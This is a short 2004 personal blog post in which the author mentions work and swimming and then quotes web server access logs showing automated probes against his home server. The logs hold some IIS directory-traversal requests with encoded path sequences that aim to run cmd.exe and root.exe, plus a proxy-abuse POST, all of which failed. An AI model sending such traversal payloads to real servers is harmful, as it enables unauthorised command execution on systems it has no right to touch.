life continues

1 minute read (372 words)

Worked many hours this week, trying to get new work web site finished.

So this evening I cycled to the pool and did an hours training. I'm now tired and chlorinated, but very relaxed.
---
My web server went off on one at 2am the other night (just when I was thinking of going to sleep), thrashing its hdd. Think someone was trying to hack into it with a buffer overflow. Here's the log:

4.227.111.174 - - [09/Sep/2004:02:22:01 +0100] "POST http://4.227.111.174:25/ HTTP/1.1" 200 480 "-" "-"

Sods.

Looking at my logs, the server was subject to a few attempts within hours of it coming online.
Much more than my hosted site. Guess it's people running nmap against adsl dial up ip ranges and getting all excited by the prospect of an open port 80.

Here's a classic example:

81.70.101.40 - - [05/Sep/2004:17:37:46 +0100] "GET /.hash=eb649e3d22cdb034d91b64d4c11215f83a7e2fda HTTP/1.1" 404 372 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:26 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:28 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 340 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:28 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:28 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:28 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 364 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:28 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 381 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:28 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 381 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:28 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 397 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 363 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 354 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 354 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 364 "-" "-"
81.164.85.239 - - [06/Sep/2004:18:08:29 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 364 "-" "-"
81.215.120.25 - - [07/Sep/2004:12:59:20 +0100] "GET /.hash=cf770b6f55e15660d70f00542bd58efeb7a8487f HTTP/1.1" 404 372 "-" "-"

--
By the way, if you think nmap is very uncool to know about, may I direct you to the news article on nmap's site which shows Trinity actually doing a real hacking attack in the film Matrix Reloaded
http://www.insecure.org/


Tweet This || Post to LinkedIn || Page Source

Subscribe for updates on software development, contracting, side projects, blog posts and who knows what else. Read the archives for an idea of content.

Mailing list powered by the excellent buttondown.email.